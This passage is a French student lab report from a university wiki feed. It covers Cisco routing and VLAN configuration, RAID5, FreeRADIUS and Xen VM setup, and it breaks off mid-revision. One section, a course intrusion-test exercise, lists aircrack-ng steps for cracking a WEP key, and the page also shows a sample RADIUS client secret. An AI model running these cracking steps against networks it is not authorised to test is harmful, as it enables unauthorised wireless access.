 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49081</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49081"/>
				<updated>2018-12-21T14:26:11Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
